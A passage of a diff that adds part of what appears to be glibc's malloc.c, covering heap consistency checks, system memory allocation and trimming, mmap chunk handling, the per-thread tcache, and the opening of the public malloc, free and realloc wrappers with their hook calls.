+  assert (prev_inuse (p));
+}
+
+
+/*
+   Properties of malloc_state.
+
+   This may be useful for debugging malloc, as well as detecting user
+   programmer errors that somehow write into malloc_state.
+
+   If you are extending or experimenting with this malloc, you can
+   probably figure out how to hack this routine to print out or
+   display chunk addresses, sizes, bins, and other instrumentation.
+ */
+
+static void
+do_check_malloc_state (mstate av)
+{
+  int i;
+  mchunkptr p;
+  mchunkptr q;
+  mbinptr b;
+  unsigned int idx;
+  INTERNAL_SIZE_T size;
+  unsigned long total = 0;
+  int max_fast_bin;
+
+  /* internal size_t must be no wider than pointer type */
+  assert (sizeof (INTERNAL_SIZE_T) <= sizeof (char *));
+
+  /* alignment is a power of 2 */
+  assert ((MALLOC_ALIGNMENT & (MALLOC_ALIGNMENT - 1)) == 0);
+
+  /* cannot run remaining checks until fully initialized */
+  if (av->top == 0 || av->top == initial_top (av))
+    return;
+
+  /* pagesize is a power of 2 */
+  assert (powerof2(GLRO (dl_pagesize)));
+
+  /* A contiguous main_arena is consistent with sbrk_base.  */
+  if (av == &main_arena && contiguous (av))
+    assert ((char *) mp_.sbrk_base + av->system_mem ==
+            (char *) av->top + chunksize (av->top));
+
+  /* properties of fastbins */
+
+  /* max_fast is in allowed range */
+  assert ((get_max_fast () & ~1) <= request2size (MAX_FAST_SIZE));
+
+  max_fast_bin = fastbin_index (get_max_fast ());
+
+  for (i = 0; i < NFASTBINS; ++i)
+    {
+      p = fastbin (av, i);
+
+      /* The following test can only be performed for the main arena.
+         While mallopt calls malloc_consolidate to get rid of all fast
+         bins (especially those larger than the new maximum) this does
+         only happen for the main arena.  Trying to do this for any
+         other arena would mean those arenas have to be locked and
+         malloc_consolidate be called for them.  This is excessive.  And
+         even if this is acceptable to somebody it still cannot solve
+         the problem completely since if the arena is locked a
+         concurrent malloc call might create a new arena which then
+         could use the newly invalid fast bins.  */
+
+      /* all bins past max_fast are empty */
+      if (av == &main_arena && i > max_fast_bin)
+        assert (p == 0);
+
+      while (p != 0)
+        {
+          /* each chunk claims to be inuse */
+          do_check_inuse_chunk (av, p);
+          total += chunksize (p);
+          /* chunk belongs in this bin */
+          assert (fastbin_index (chunksize (p)) == i);
+          p = p->fd;
+        }
+    }
+
+  if (total != 0)
+    assert (have_fastchunks (av));
+  else if (!have_fastchunks (av))
+    assert (total == 0);
+
+  /* check normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      b = bin_at (av, i);
+
+      /* binmap is accurate (except for bin 1 == unsorted_chunks) */
+      if (i >= 2)
+        {
+          unsigned int binbit = get_binmap (av, i);
+          int empty = last (b) == b;
+          if (!binbit)
+            assert (empty);
+          else if (!empty)
+            assert (binbit);
+        }
+
+      for (p = last (b); p != b; p = p->bk)
+        {
+          /* each chunk claims to be free */
+          do_check_free_chunk (av, p);
+          size = chunksize (p);
+          total += size;
+          if (i >= 2)
+            {
+              /* chunk belongs in bin */
+              idx = bin_index (size);
+              assert (idx == i);
+              /* lists are sorted */
+              assert (p->bk == b ||
+                      (unsigned long) chunksize (p->bk) >= (unsigned long) chunksize (p));
+
+              if (!in_smallbin_range (size))
+                {
+                  if (p->fd_nextsize != NULL)
+                    {
+                      if (p->fd_nextsize == p)
+                        assert (p->bk_nextsize == p);
+                      else
+                        {
+                          if (p->fd_nextsize == first (b))
+                            assert (chunksize (p) < chunksize (p->fd_nextsize));
+                          else
+                            assert (chunksize (p) > chunksize (p->fd_nextsize));
+
+                          if (p == first (b))
+                            assert (chunksize (p) > chunksize (p->bk_nextsize));
+                          else
+                            assert (chunksize (p) < chunksize (p->bk_nextsize));
+                        }
+                    }
+                  else
+                    assert (p->bk_nextsize == NULL);
+                }
+            }
+          else if (!in_smallbin_range (size))
+            assert (p->fd_nextsize == NULL && p->bk_nextsize == NULL);
+          /* chunk is followed by a legal chain of inuse chunks */
+          for (q = next_chunk (p);
+               (q != av->top && inuse (q) &&
+                (unsigned long) (chunksize (q)) >= MINSIZE);
+               q = next_chunk (q))
+            do_check_inuse_chunk (av, q);
+        }
+    }
+
+  /* top chunk is OK */
+  check_chunk (av, av->top);
+}
+#endif
+
+
+/* ----------------- Support for debugging hooks -------------------- */
+#include "hooks.c"
+
+
+/* ----------- Routines dealing with system allocation -------------- */
+
+/*
+   sysmalloc handles malloc cases requiring more memory from the system.
+   On entry, it is assumed that av->top does not have enough
+   space to service request for nb bytes, thus requiring that av->top
+   be extended or replaced.
+ */
+
+static void *
+sysmalloc (INTERNAL_SIZE_T nb, mstate av)
+{
+  mchunkptr old_top;              /* incoming value of av->top */
+  INTERNAL_SIZE_T old_size;       /* its size */
+  char *old_end;                  /* its end address */
+
+  long size;                      /* arg to first MORECORE or mmap call */
+  char *brk;                      /* return value from MORECORE */
+
+  long correction;                /* arg to 2nd MORECORE call */
+  char *snd_brk;                  /* 2nd return val */
+
+  INTERNAL_SIZE_T front_misalign; /* unusable bytes at front of new space */
+  INTERNAL_SIZE_T end_misalign;   /* partial page left at end of new space */
+  char *aligned_brk;              /* aligned offset into brk */
+
+  mchunkptr p;                    /* the allocated/returned chunk */
+  mchunkptr remainder;            /* remainder from allocation */
+  unsigned long remainder_size;   /* its size */
+
+
+  size_t pagesize = GLRO (dl_pagesize);
+  bool tried_mmap = false;
+
+
+  /*
+     If have mmap, and the request size meets the mmap threshold, and
+     the system supports mmap, and there are few enough currently
+     allocated mmapped regions, try to directly map this request
+     rather than expanding top.
+   */
+
+  if (av == NULL
+      || ((unsigned long) (nb) >= (unsigned long) (mp_.mmap_threshold)
+	  && (mp_.n_mmaps < mp_.n_mmaps_max)))
+    {
+      char *mm;           /* return value from mmap call*/
+
+    try_mmap:
+      /*
+         Round up size to nearest page.  For mmapped chunks, the overhead
+         is one SIZE_SZ unit larger than for normal chunks, because there
+         is no following chunk whose prev_size field could be used.
+
+         See the front_misalign handling below, for glibc there is no
+         need for further alignments unless we have have high alignment.
+       */
+      if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+        size = ALIGN_UP (nb + SIZE_SZ, pagesize);
+      else
+        size = ALIGN_UP (nb + SIZE_SZ + MALLOC_ALIGN_MASK, pagesize);
+      tried_mmap = true;
+
+      /* Don't try if size wraps around 0 */
+      if ((unsigned long) (size) > (unsigned long) (nb))
+        {
+          mm = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+          if (mm != MAP_FAILED)
+            {
+              /*
+                 The offset to the start of the mmapped region is stored
+                 in the prev_size field of the chunk. This allows us to adjust
+                 returned start address to meet alignment requirements here
+                 and in memalign(), and still be able to compute proper
+                 address argument for later munmap in free() and realloc().
+               */
+
+              if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                {
+                  /* For glibc, chunk2mem increases the address by 2*SIZE_SZ and
+                     MALLOC_ALIGN_MASK is 2*SIZE_SZ-1.  Each mmap'ed area is page
+                     aligned and therefore definitely MALLOC_ALIGN_MASK-aligned.  */
+                  assert (((INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK) == 0);
+                  front_misalign = 0;
+                }
+              else
+                front_misalign = (INTERNAL_SIZE_T) chunk2mem (mm) & MALLOC_ALIGN_MASK;
+              if (front_misalign > 0)
+                {
+                  correction = MALLOC_ALIGNMENT - front_misalign;
+                  p = (mchunkptr) (mm + correction);
+		  set_prev_size (p, correction);
+                  set_head (p, (size - correction) | IS_MMAPPED);
+                }
+              else
+                {
+                  p = (mchunkptr) mm;
+		  set_prev_size (p, 0);
+                  set_head (p, size | IS_MMAPPED);
+                }
+
+              /* update statistics */
+
+              int new = atomic_exchange_and_add (&mp_.n_mmaps, 1) + 1;
+              atomic_max (&mp_.max_n_mmaps, new);
+
+              unsigned long sum;
+              sum = atomic_exchange_and_add (&mp_.mmapped_mem, size) + size;
+              atomic_max (&mp_.max_mmapped_mem, sum);
+
+              check_chunk (av, p);
+
+              return chunk2mem (p);
+            }
+        }
+    }
+
+  /* There are no usable arenas and mmap also failed.  */
+  if (av == NULL)
+    return 0;
+
+  /* Record incoming configuration of top */
+
+  old_top = av->top;
+  old_size = chunksize (old_top);
+  old_end = (char *) (chunk_at_offset (old_top, old_size));
+
+  brk = snd_brk = (char *) (MORECORE_FAILURE);
+
+  /*
+     If not the first time through, we require old_size to be
+     at least MINSIZE and to have prev_inuse set.
+   */
+
+  assert ((old_top == initial_top (av) && old_size == 0) ||
+          ((unsigned long) (old_size) >= MINSIZE &&
+           prev_inuse (old_top) &&
+           ((unsigned long) old_end & (pagesize - 1)) == 0));
+
+  /* Precondition: not enough current space to satisfy nb request */
+  assert ((unsigned long) (old_size) < (unsigned long) (nb + MINSIZE));
+
+
+  if (av != &main_arena)
+    {
+      heap_info *old_heap, *heap;
+      size_t old_heap_size;
+
+      /* First try to extend the current heap. */
+      old_heap = heap_for_ptr (old_top);
+      old_heap_size = old_heap->size;
+      if ((long) (MINSIZE + nb - old_size) > 0
+          && grow_heap (old_heap, MINSIZE + nb - old_size) == 0)
+        {
+          av->system_mem += old_heap->size - old_heap_size;
+          set_head (old_top, (((char *) old_heap + old_heap->size) - (char *) old_top)
+                    | PREV_INUSE);
+        }
+      else if ((heap = new_heap (nb + (MINSIZE + sizeof (*heap)), mp_.top_pad)))
+        {
+          /* Use a newly allocated heap.  */
+          heap->ar_ptr = av;
+          heap->prev = old_heap;
+          av->system_mem += heap->size;
+          /* Set up the new top.  */
+          top (av) = chunk_at_offset (heap, sizeof (*heap));
+          set_head (top (av), (heap->size - sizeof (*heap)) | PREV_INUSE);
+
+          /* Setup fencepost and free the old top chunk with a multiple of
+             MALLOC_ALIGNMENT in size. */
+          /* The fencepost takes at least MINSIZE bytes, because it might
+             become the top chunk again later.  Note that a footer is set
+             up, too, although the chunk is marked in use. */
+          old_size = (old_size - MINSIZE) & ~MALLOC_ALIGN_MASK;
+          set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ), 0 | PREV_INUSE);
+          if (old_size >= MINSIZE)
+            {
+              set_head (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (chunk_at_offset (old_top, old_size), (2 * SIZE_SZ));
+              set_head (old_top, old_size | PREV_INUSE | NON_MAIN_ARENA);
+              _int_free (av, old_top, 1);
+            }
+          else
+            {
+              set_head (old_top, (old_size + 2 * SIZE_SZ) | PREV_INUSE);
+              set_foot (old_top, (old_size + 2 * SIZE_SZ));
+            }
+        }
+      else if (!tried_mmap)
+        /* We can at least try to use to mmap memory.  */
+        goto try_mmap;
+    }
+  else     /* av == main_arena */
+
+
+    { /* Request enough space for nb + pad + overhead */
+      size = nb + mp_.top_pad + MINSIZE;
+
+      /*
+         If contiguous, we can subtract out existing space that we hope to
+         combine with new space. We add it back later only if
+         we don't actually get contiguous space.
+       */
+
+      if (contiguous (av))
+        size -= old_size;
+
+      /*
+         Round to a multiple of page size.
+         If MORECORE is not contiguous, this ensures that we only call it
+         with whole-page arguments.  And if MORECORE is contiguous and
+         this is not first time through, this preserves page-alignment of
+         previous calls. Otherwise, we correct to page-align below.
+       */
+
+      size = ALIGN_UP (size, pagesize);
+
+      /*
+         Don't try to call MORECORE if argument is so big as to appear
+         negative. Note that since mmap takes size_t arg, it may succeed
+         below even if we cannot call MORECORE.
+       */
+
+      if (size > 0)
+        {
+          brk = (char *) (MORECORE (size));
+          LIBC_PROBE (memory_sbrk_more, 2, brk, size);
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          /* Call the `morecore' hook if necessary.  */
+          void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+          if (__builtin_expect (hook != NULL, 0))
+            (*hook)();
+        }
+      else
+        {
+          /*
+             If have mmap, try using it as a backup when MORECORE fails or
+             cannot be used. This is worth doing on systems that have "holes" in
+             address space, so sbrk cannot extend to give contiguous space, but
+             space is available elsewhere.  Note that we ignore mmap max count
+             and threshold limits, since the space will not be used as a
+             segregated mmap region.
+           */
+
+          /* Cannot merge with old top, so add its size back in */
+          if (contiguous (av))
+            size = ALIGN_UP (size + old_size, pagesize);
+
+          /* If we are relying on mmap as backup, then use larger units */
+          if ((unsigned long) (size) < (unsigned long) (MMAP_AS_MORECORE_SIZE))
+            size = MMAP_AS_MORECORE_SIZE;
+
+          /* Don't try if size wraps around 0 */
+          if ((unsigned long) (size) > (unsigned long) (nb))
+            {
+              char *mbrk = (char *) (MMAP (0, size, PROT_READ | PROT_WRITE, 0));
+
+              if (mbrk != MAP_FAILED)
+                {
+                  /* We do not need, and cannot use, another sbrk call to find end */
+                  brk = mbrk;
+                  snd_brk = brk + size;
+
+                  /*
+                     Record that we no longer have a contiguous sbrk region.
+                     After the first time mmap is used as backup, we do not
+                     ever rely on contiguous space since this could incorrectly
+                     bridge regions.
+                   */
+                  set_noncontiguous (av);
+                }
+            }
+        }
+
+      if (brk != (char *) (MORECORE_FAILURE))
+        {
+          if (mp_.sbrk_base == 0)
+            mp_.sbrk_base = brk;
+          av->system_mem += size;
+
+          /*
+             If MORECORE extends previous space, we can likewise extend top size.
+           */
+
+          if (brk == old_end && snd_brk == (char *) (MORECORE_FAILURE))
+            set_head (old_top, (size + old_size) | PREV_INUSE);
+
+          else if (contiguous (av) && old_size && brk < old_end)
+            {
+              /* Oops!  Someone else killed our space..  Can't touch anything.  */
+              malloc_printerr (3, "break adjusted to free malloc space", brk,
+			       av);
+            }
+
+          /*
+             Otherwise, make adjustments:
+
+           * If the first time through or noncontiguous, we need to call sbrk
+              just to find out where the end of memory lies.
+
+           * We need to ensure that all returned chunks from malloc will meet
+              MALLOC_ALIGNMENT
+
+           * If there was an intervening foreign sbrk, we need to adjust sbrk
+              request size to account for fact that we will not be able to
+              combine new space with existing space in old_top.
+
+           * Almost all systems internally allocate whole pages at a time, in
+              which case we might as well use the whole last page of request.
+              So we allocate enough more memory to hit a page boundary now,
+              which in turn causes future contiguous calls to page-align.
+           */
+
+          else
+            {
+              front_misalign = 0;
+              end_misalign = 0;
+              correction = 0;
+              aligned_brk = brk;
+
+              /* handle contiguous cases */
+              if (contiguous (av))
+                {
+                  /* Count foreign sbrk as system_mem.  */
+                  if (old_size)
+                    av->system_mem += brk - old_end;
+
+                  /* Guarantee alignment of first new chunk made from this space */
+
+                  front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                  if (front_misalign > 0)
+                    {
+                      /*
+                         Skip over some bytes to arrive at an aligned position.
+                         We don't need to specially mark these wasted front bytes.
+                         They will never be accessed anyway because
+                         prev_inuse of av->top (and any chunk created from its start)
+                         is always true after initialization.
+                       */
+
+                      correction = MALLOC_ALIGNMENT - front_misalign;
+                      aligned_brk += correction;
+                    }
+
+                  /*
+                     If this isn't adjacent to existing space, then we will not
+                     be able to merge with old_top space, so must add to 2nd request.
+                   */
+
+                  correction += old_size;
+
+                  /* Extend the end address to hit a page boundary */
+                  end_misalign = (INTERNAL_SIZE_T) (brk + size + correction);
+                  correction += (ALIGN_UP (end_misalign, pagesize)) - end_misalign;
+
+                  assert (correction >= 0);
+                  snd_brk = (char *) (MORECORE (correction));
+
+                  /*
+                     If can't allocate correction, try to at least find out current
+                     brk.  It might be enough to proceed without failing.
+
+                     Note that if second sbrk did NOT fail, we assume that space
+                     is contiguous with first sbrk. This is a safe assumption unless
+                     program is multithreaded but doesn't use locks and a foreign sbrk
+                     occurred between our first and second calls.
+                   */
+
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      correction = 0;
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                  else
+                    {
+                      /* Call the `morecore' hook if necessary.  */
+                      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+                      if (__builtin_expect (hook != NULL, 0))
+                        (*hook)();
+                    }
+                }
+
+              /* handle non-contiguous cases */
+              else
+                {
+                  if (MALLOC_ALIGNMENT == 2 * SIZE_SZ)
+                    /* MORECORE/mmap must correctly align */
+                    assert (((unsigned long) chunk2mem (brk) & MALLOC_ALIGN_MASK) == 0);
+                  else
+                    {
+                      front_misalign = (INTERNAL_SIZE_T) chunk2mem (brk) & MALLOC_ALIGN_MASK;
+                      if (front_misalign > 0)
+                        {
+                          /*
+                             Skip over some bytes to arrive at an aligned position.
+                             We don't need to specially mark these wasted front bytes.
+                             They will never be accessed anyway because
+                             prev_inuse of av->top (and any chunk created from its start)
+                             is always true after initialization.
+                           */
+
+                          aligned_brk += MALLOC_ALIGNMENT - front_misalign;
+                        }
+                    }
+
+                  /* Find out current end of memory */
+                  if (snd_brk == (char *) (MORECORE_FAILURE))
+                    {
+                      snd_brk = (char *) (MORECORE (0));
+                    }
+                }
+
+              /* Adjust top based on results of second sbrk */
+              if (snd_brk != (char *) (MORECORE_FAILURE))
+                {
+                  av->top = (mchunkptr) aligned_brk;
+                  set_head (av->top, (snd_brk - aligned_brk + correction) | PREV_INUSE);
+                  av->system_mem += correction;
+
+                  /*
+                     If not the first time through, we either have a
+                     gap due to foreign sbrk or a non-contiguous region.  Insert a
+                     double fencepost at old_top to prevent consolidation with space
+                     we don't own. These fenceposts are artificial chunks that are
+                     marked as inuse and are in any case too small to use.  We need
+                     two to make sizes and alignments work out.
+                   */
+
+                  if (old_size != 0)
+                    {
+                      /*
+                         Shrink old_top to insert fenceposts, keeping size a
+                         multiple of MALLOC_ALIGNMENT. We know there is at least
+                         enough space in old_top to do this.
+                       */
+                      old_size = (old_size - 4 * SIZE_SZ) & ~MALLOC_ALIGN_MASK;
+                      set_head (old_top, old_size | PREV_INUSE);
+
+                      /*
+                         Note that the following assignments completely overwrite
+                         old_top when old_size was previously MINSIZE.  This is
+                         intentional. We need the fencepost, even if old_top otherwise gets
+                         lost.
+                       */
+		      set_head (chunk_at_offset (old_top, old_size),
+				(2 * SIZE_SZ) | PREV_INUSE);
+		      set_head (chunk_at_offset (old_top, old_size + 2 * SIZE_SZ),
+				(2 * SIZE_SZ) | PREV_INUSE);
+
+                      /* If possible, release the rest. */
+                      if (old_size >= MINSIZE)
+                        {
+                          _int_free (av, old_top, 1);
+                        }
+                    }
+                }
+            }
+        }
+    } /* if (av !=  &main_arena) */
+
+  if ((unsigned long) av->system_mem > (unsigned long) (av->max_system_mem))
+    av->max_system_mem = av->system_mem;
+  check_malloc_state (av);
+
+  /* finally, do the allocation */
+  p = av->top;
+  size = chunksize (p);
+
+  /* check that one of the above allocation paths succeeded */
+  if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+    {
+      remainder_size = size - nb;
+      remainder = chunk_at_offset (p, nb);
+      av->top = remainder;
+      set_head (p, nb | PREV_INUSE | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE);
+      check_malloced_chunk (av, p, nb);
+      return chunk2mem (p);
+    }
+
+  /* catch all failure paths */
+  __set_errno (ENOMEM);
+  return 0;
+}
+
+
+/*
+   systrim is an inverse of sorts to sysmalloc.  It gives memory back
+   to the system (via negative arguments to sbrk) if there is unused
+   memory at the `high' end of the malloc pool. It is called
+   automatically by free() when top space exceeds the trim
+   threshold. It is also called by the public malloc_trim routine.  It
+   returns 1 if it actually released any memory, else 0.
+ */
+
+static int
+systrim (size_t pad, mstate av)
+{
+  long top_size;         /* Amount of top-most memory */
+  long extra;            /* Amount to release */
+  long released;         /* Amount actually released */
+  char *current_brk;     /* address returned by pre-check sbrk call */
+  char *new_brk;         /* address returned by post-check sbrk call */
+  size_t pagesize;
+  long top_area;
+
+  pagesize = GLRO (dl_pagesize);
+  top_size = chunksize (av->top);
+
+  top_area = top_size - MINSIZE - 1;
+  if (top_area <= pad)
+    return 0;
+
+  /* Release in pagesize units and round down to the nearest page.  */
+  extra = ALIGN_DOWN(top_area - pad, pagesize);
+
+  if (extra == 0)
+    return 0;
+
+  /*
+     Only proceed if end of memory is where we last set it.
+     This avoids problems if there were foreign sbrk calls.
+   */
+  current_brk = (char *) (MORECORE (0));
+  if (current_brk == (char *) (av->top) + top_size)
+    {
+      /*
+         Attempt to release memory. We ignore MORECORE return value,
+         and instead call again to find out where new end of memory is.
+         This avoids problems if first call releases less than we asked,
+         of if failure somehow altered brk value. (We could still
+         encounter problems if it altered brk in some very bad way,
+         but the only thing we can do is adjust anyway, which will cause
+         some downstream failure.)
+       */
+
+      MORECORE (-extra);
+      /* Call the `morecore' hook if necessary.  */
+      void (*hook) (void) = atomic_forced_read (__after_morecore_hook);
+      if (__builtin_expect (hook != NULL, 0))
+        (*hook)();
+      new_brk = (char *) (MORECORE (0));
+
+      LIBC_PROBE (memory_sbrk_less, 2, new_brk, extra);
+
+      if (new_brk != (char *) MORECORE_FAILURE)
+        {
+          released = (long) (current_brk - new_brk);
+
+          if (released != 0)
+            {
+              /* Success. Adjust top. */
+              av->system_mem -= released;
+              set_head (av->top, (top_size - released) | PREV_INUSE);
+              check_malloc_state (av);
+              return 1;
+            }
+        }
+    }
+  return 0;
+}
+
+static void
+internal_function
+munmap_chunk (mchunkptr p)
+{
+  INTERNAL_SIZE_T size = chunksize (p);
+
+  assert (chunk_is_mmapped (p));
+
+  /* Do nothing if the chunk is a faked mmapped chunk in the dumped
+     main arena.  We never free this memory.  */
+  if (DUMPED_MAIN_ARENA_CHUNK (p))
+    return;
+
+  uintptr_t block = (uintptr_t) p - prev_size (p);
+  size_t total_size = prev_size (p) + size;
+  /* Unfortunately we have to do the compilers job by hand here.  Normally
+     we would test BLOCK and TOTAL-SIZE separately for compliance with the
+     page size.  But gcc does not recognize the optimization possibility
+     (in the moment at least) so we combine the two values into one before
+     the bit test.  */
+  if (__builtin_expect (((block | total_size) & (GLRO (dl_pagesize) - 1)) != 0, 0))
+    {
+      malloc_printerr (check_action, "munmap_chunk(): invalid pointer",
+                       chunk2mem (p), NULL);
+      return;
+    }
+
+  atomic_decrement (&mp_.n_mmaps);
+  atomic_add (&mp_.mmapped_mem, -total_size);
+
+  /* If munmap failed the process virtual memory address space is in a
+     bad shape.  Just leave the block hanging around, the process will
+     terminate shortly anyway since not much can be done.  */
+  __munmap ((char *) block, total_size);
+}
+
+#if HAVE_MREMAP
+
+static mchunkptr
+internal_function
+mremap_chunk (mchunkptr p, size_t new_size)
+{
+  size_t pagesize = GLRO (dl_pagesize);
+  INTERNAL_SIZE_T offset = prev_size (p);
+  INTERNAL_SIZE_T size = chunksize (p);
+  char *cp;
+
+  assert (chunk_is_mmapped (p));
+  assert (((size + offset) & (GLRO (dl_pagesize) - 1)) == 0);
+
+  /* Note the extra SIZE_SZ overhead as in mmap_chunk(). */
+  new_size = ALIGN_UP (new_size + offset + SIZE_SZ, pagesize);
+
+  /* No need to remap if the number of pages does not change.  */
+  if (size + offset == new_size)
+    return p;
+
+  cp = (char *) __mremap ((char *) p - offset, size + offset, new_size,
+                          MREMAP_MAYMOVE);
+
+  if (cp == MAP_FAILED)
+    return 0;
+
+  p = (mchunkptr) (cp + offset);
+
+  assert (aligned_OK (chunk2mem (p)));
+
+  assert (prev_size (p) == offset);
+  set_head (p, (new_size - offset) | IS_MMAPPED);
+
+  INTERNAL_SIZE_T new;
+  new = atomic_exchange_and_add (&mp_.mmapped_mem, new_size - size - offset)
+        + new_size - size - offset;
+  atomic_max (&mp_.max_mmapped_mem, new);
+  return p;
+}
+#endif /* HAVE_MREMAP */
+
+/*------------------------ Public wrappers. --------------------------------*/
+
+#if USE_TCACHE
+
+/* We overlay this structure on the user-data portion of a chunk when
+   the chunk is stored in the per-thread cache.  */
+typedef struct tcache_entry
+{
+  struct tcache_entry *next;
+} tcache_entry;
+
+/* There is one of these for each thread, which contains the
+   per-thread cache (hence "tcache_perthread_struct").  Keeping
+   overall size low is mildly important.  Note that COUNTS and ENTRIES
+   are redundant (we could have just counted the linked list each
+   time), this is for performance reasons.  */
+typedef struct tcache_perthread_struct
+{
+  char counts[TCACHE_MAX_BINS];
+  tcache_entry *entries[TCACHE_MAX_BINS];
+} tcache_perthread_struct;
+
+static __thread char tcache_shutting_down = 0;
+static __thread tcache_perthread_struct *tcache = NULL;
+
+/* Caller must ensure that we know tc_idx is valid and there's room
+   for more chunks.  */
+static void
+tcache_put (mchunkptr chunk, size_t tc_idx)
+{
+  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
+  assert (tc_idx < TCACHE_MAX_BINS);
+  e->next = tcache->entries[tc_idx];
+  tcache->entries[tc_idx] = e;
+  ++(tcache->counts[tc_idx]);
+}
+
+/* Caller must ensure that we know tc_idx is valid and there's
+   available chunks to remove.  */
+static void *
+tcache_get (size_t tc_idx)
+{
+  tcache_entry *e = tcache->entries[tc_idx];
+  assert (tc_idx < TCACHE_MAX_BINS);
+  assert (tcache->entries[tc_idx] > 0);
+  tcache->entries[tc_idx] = e->next;
+  --(tcache->counts[tc_idx]);
+  return (void *) e;
+}
+
+static void __attribute__ ((section ("__libc_thread_freeres_fn")))
+tcache_thread_freeres (void)
+{
+  int i;
+  tcache_perthread_struct *tcache_tmp = tcache;
+
+  if (!tcache)
+    return;
+
+  tcache = NULL;
+
+  for (i = 0; i < TCACHE_MAX_BINS; ++i)
+    {
+      while (tcache_tmp->entries[i])
+	{
+	  tcache_entry *e = tcache_tmp->entries[i];
+	  tcache_tmp->entries[i] = e->next;
+	  __libc_free (e);
+	}
+    }
+
+  __libc_free (tcache_tmp);
+
+  tcache_shutting_down = 1;
+}
+text_set_element (__libc_thread_subfreeres, tcache_thread_freeres);
+
+static void
+tcache_init(void)
+{
+  mstate ar_ptr;
+  void *victim = 0;
+  const size_t bytes = sizeof (tcache_perthread_struct);
+
+  if (tcache_shutting_down)
+    return;
+
+  arena_get (ar_ptr, bytes);
+  victim = _int_malloc (ar_ptr, bytes);
+  if (!victim && ar_ptr != NULL)
+    {
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  /* In a low memory situation, we may not be able to allocate memory
+     - in which case, we just keep trying later.  However, we
+     typically do this very early, so either there is sufficient
+     memory, or there isn't enough memory to do non-trivial
+     allocations anyway.  */
+  if (victim)
+    {
+      tcache = (tcache_perthread_struct *) victim;
+      memset (tcache, 0, sizeof (tcache_perthread_struct));
+    }
+
+}
+
+#define MAYBE_INIT_TCACHE() \
+  if (__glibc_unlikely (tcache == NULL)) \
+    tcache_init();
+
+#else
+#define MAYBE_INIT_TCACHE()
+#endif
+
+void *
+__libc_malloc (size_t bytes)
+{
+  mstate ar_ptr;
+  void *victim;
+
+  void *(*hook) (size_t, const void *)
+    = atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(bytes, RETURN_ADDRESS (0));
+#if USE_TCACHE
+  /* int_free also calls request2size, be careful to not pad twice.  */
+  size_t tbytes = request2size (bytes);
+  size_t tc_idx = csize2tidx (tbytes);
+
+  MAYBE_INIT_TCACHE ();
+
+  DIAG_PUSH_NEEDS_COMMENT;
+  if (tc_idx < mp_.tcache_bins
+      /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
+      && tcache
+      && tcache->entries[tc_idx] != NULL)
+    {
+      return tcache_get (tc_idx);
+    }
+  DIAG_POP_NEEDS_COMMENT;
+#endif
+
+  arena_get (ar_ptr, bytes);
+
+  victim = _int_malloc (ar_ptr, bytes);
+  /* Retry with another arena only if we were able to find a usable arena
+     before.  */
+  if (!victim && ar_ptr != NULL)
+    {
+      LIBC_PROBE (memory_malloc_retry, 1, bytes);
+      ar_ptr = arena_get_retry (ar_ptr, bytes);
+      victim = _int_malloc (ar_ptr, bytes);
+    }
+
+  if (ar_ptr != NULL)
+    __libc_lock_unlock (ar_ptr->mutex);
+
+  assert (!victim || chunk_is_mmapped (mem2chunk (victim)) ||
+          ar_ptr == arena_for_chunk (mem2chunk (victim)));
+  return victim;
+}
+libc_hidden_def (__libc_malloc)
+
+void
+__libc_free (void *mem)
+{
+  mstate ar_ptr;
+  mchunkptr p;                          /* chunk corresponding to mem */
+
+  void (*hook) (void *, const void *)
+    = atomic_forced_read (__free_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      (*hook)(mem, RETURN_ADDRESS (0));
+      return;
+    }
+
+  if (mem == 0)                              /* free(0) has no effect */
+    return;
+
+  p = mem2chunk (mem);
+
+  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
+    {
+      /* See if the dynamic brk/mmap threshold needs adjusting.
+	 Dumped fake mmapped chunks do not affect the threshold.  */
+      if (!mp_.no_dyn_threshold
+          && chunksize_nomask (p) > mp_.mmap_threshold
+          && chunksize_nomask (p) <= DEFAULT_MMAP_THRESHOLD_MAX
+	  && !DUMPED_MAIN_ARENA_CHUNK (p))
+        {
+          mp_.mmap_threshold = chunksize (p);
+          mp_.trim_threshold = 2 * mp_.mmap_threshold;
+          LIBC_PROBE (memory_mallopt_free_dyn_thresholds, 2,
+                      mp_.mmap_threshold, mp_.trim_threshold);
+        }
+      munmap_chunk (p);
+      return;
+    }
+
+  MAYBE_INIT_TCACHE ();
+
+  ar_ptr = arena_for_chunk (p);
+  _int_free (ar_ptr, p, 0);
+}
+libc_hidden_def (__libc_free)
+
+void *
+__libc_realloc (void *oldmem, size_t bytes)
+{
+  mstate ar_ptr;
+  INTERNAL_SIZE_T nb;         /* padded request size */
+
+  void *newp;             /* chunk to return */
+
+  void *(*hook) (void *, size_t, const void *) =
+    atomic_forced_read (__realloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    return (*hook)(oldmem, bytes, RETURN_ADDRESS (0));
+
+#if REALLOC_ZERO_BYTES_FREES
+  if (bytes == 0 && oldmem != NULL)
+    {
+      __libc_free (oldmem); return 0;
+    }
+#endif
+
+  /* realloc of null is supposed to be same as malloc */
+  if (oldmem == 0)
+    return __libc_malloc (bytes);
+
